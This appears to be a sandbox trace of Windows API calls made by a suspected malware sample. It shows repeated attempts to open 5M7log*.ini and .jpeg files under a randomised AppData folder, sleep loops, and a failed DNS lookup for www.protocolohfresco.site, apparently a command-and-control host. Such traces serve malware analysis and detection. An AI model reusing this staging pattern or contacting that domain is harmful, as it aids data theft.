RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.723] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.723] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.723] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.723] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.723] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.723] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.723] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.723] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.723] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.723] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.723] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.723] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0205.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.723] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.724] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.724] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.724] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.724] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.724] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6ed0) returned 1 [0205.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.724] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.724] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.724] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.724] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0205.724] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.725] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0205.725] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0205.725] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f6810) returned 1 [0205.725] Sleep (dwMilliseconds=0x7d0) [0205.772] Sleep (dwMilliseconds=0x7d0) [0205.808] Sleep (dwMilliseconds=0x7d0) [0205.823] Sleep (dwMilliseconds=0x7d0) [0205.884] Sleep (dwMilliseconds=0x7d0) [0205.928] Sleep (dwMilliseconds=0x7d0) [0206.027] Sleep (dwMilliseconds=0x7d0) [0206.060] Sleep (dwMilliseconds=0x7d0) [0206.087] Sleep (dwMilliseconds=0x7d0) [0206.130] Sleep (dwMilliseconds=0x7d0) [0206.168] Sleep (dwMilliseconds=0x7d0) [0206.206] Sleep (dwMilliseconds=0x7d0) [0206.210] Sleep (dwMilliseconds=0x7d0) [0206.295] Sleep (dwMilliseconds=0x7d0) [0206.387] Sleep (dwMilliseconds=0x7d0) [0206.463] Sleep (dwMilliseconds=0x7d0) [0206.608] Sleep (dwMilliseconds=0x7d0) [0207.277] socket (af=2, type=1, protocol=6) returned 0x1e74 [0207.278] getaddrinfo (in: pNodeName="www.protocolohfresco.site", pServiceName="80", pHints=0x9e74b18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e74b48 | out: ppResult=0x9e74b48*=0x0) returned 11001 [0207.279] Sleep (dwMilliseconds=0x7d0) [0207.280] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.280] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.281] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0207.281] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c860) returned 1 [0207.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.281] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.281] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.281] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c860) returned 1 [0207.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.281] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.281] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.282] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bd20) returned 1 [0207.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.282] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.282] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.282] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bed0) returned 1 [0207.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.282] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.282] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.282] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bd20) returned 1 [0207.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.282] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.282] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.282] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6cbc0) returned 1 [0207.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.282] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.282] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.282] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bd20) returned 1 [0207.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.283] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.283] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.283] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6cbc0) returned 1 [0207.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.283] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.283] 